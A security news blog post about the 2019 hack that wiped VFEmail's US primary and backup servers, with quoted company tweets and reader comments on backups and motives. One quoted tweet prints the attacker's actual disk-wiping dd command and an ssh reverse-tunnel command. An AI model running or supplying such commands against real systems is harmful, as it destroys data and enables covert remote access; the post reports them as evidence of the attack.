Disaster. There’s no other word for it.
Customers of VFEmail, a Milwaukee-based email provider for businesses and end-users since 2001, has revealed that it has suffered a ‘catastrophic’ attack after a hacker breached its systems and wiped out all of the data it was storing on its US-based servers.
A message posted on VFEmail’s website confirms the bleak news:
“We have suffered catastrophic destruction at the hands of a hacker… This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.”
According to VFEmail, it actually spotted the hacker as they were trying to cause even more damage – formatting other mail servers run by the company in the Netherlands.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
Fortunately for those customers whose data was stored on servers in the Netherlands, it appears that their backups have not been impacted. But for the rest of VFEmail’s customers the news is not so good…
At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.
— VFEmail.net (@VFEmail) February 11, 2019
US-based users are currently being urged not to try to connect their email clients to VFEmail’s servers, for fear that they might accidentally wipe out the only remaining copy of their email archive on their own computers:
“At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.”
My advice, if you find yourself in this unfortunate pickle, is that you backup any local email archive you may have as quickly as possible to avoid any accidents.
There will be many angry customers of VFEmail who will be distraught at the thought that years’ worth of irreplaceable personal and business correspondence may have been wiped out. It’s understandable that some might turn their fury towards VFEmail, and ask tough questions about why their systems weren’t better protected to keep the hacker out.
However, I think it’s worth also recognising that VFEmail is a victim too. A business that has been running for almost 20 years has fallen victim to a devastating criminal attack perpetrated by a malicious hacker, that will find hard to recover from commercially. Hacking acts like this have real human consequences – both for the companies that are hacked, and for their clients.
I can’t help but feel incredible sympathy for not only VFEmail’s customers, but also for VFEmail itself. The firm has found itself targeted by hackers before (in 2015, it was one of several email providers targeted by DDoS extortionists), but has never had experienced anything quite as bad as this.
Found this article interesting? Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.
5 comments on “VFEmail suffers ‘catastrophic’ attack, as hacker wipes email service’s primary and backup data”
It seems a completely random and unprovoked attack. No ransom demands just systematic removal/deletion of services and backup.
My initial thoughts were this has to be an inside job. The understanding of the infrastructure would have had to be gleaned over a considerable period of time.
This might seem to be a demonstration by the hacker to show other providers what they can do if the providers don't pay an extortion fee.
Is this a harbinger of evil yet to come? I'm interested in which vulnerability was actually exploited. My heart goes out to the folks at VFE.
dd(1) is a very valuable but very dangerous command in the wrong hands. This attack is one of the worst instances of defying the hacker ethics I have seen in a long time and it infuriates me on so many levels.
And yes they’re all victims of a cruel attack. However it’s also a very good lesson to those who don’t know – and that includes every victim here:
(1) Backups should not be accessible like this. A backup that’s always online is almost worthless and this is an extremely unfortunate example of this. Similarly is people believing that redundant storage is backing up: it’s not: just because it’s in say a RAID doesn’t make it safe from user errors any more than malicious actors and any more than all drives dying at once. This has actually happened to not just me but a long time friend of mine and I know we’re NOT alone here. Imagine no backups or …
(2) No disaster recovery plan.
(3) Redundant backups is a good idea and in different locations too. And
(4) Never ever ever rely on an organisation to keep your data safe. Never. Remote backups are great but supplementary. And that’s only for having the data another place. There’s still the risk of data breaches.
All around terrible but one hopes that at least some will take the lessons to heart. Sadly often people don’t learn until disaster strikes. Just like people don’t truly appreciate and understand many things that are both easy to forget [they] have and that they’re extremely lucky to have until they are deprived of it. I have always understood this with things like the above but I have been deprived of some of the very basic needs and in fact I still am – yet I had thought I had been deprived of more than I was but I didn’t realise that in fact I had more than I thought. Not until last month.
Treasure and respect and be eternally grateful for those things and people and pets etc. that you have because you never know when it might be too late. It can happen in an instance but when it’s something you can protect yourself from you absolutely should and need to do it. Trouble is if you’re unaware of it you’re also unaware that there’s even a problem! Seems obvious but it’s not. Not until you’re affected by deprivation etc.
This attack could have also been intended to wipe out incriminating emails in a way that leaves some room for plausible deniability. If you wanted to wipe out someone else's emails to hide tracks but didn't want that wipe to be clearly targeting them, why not take down the entire platform?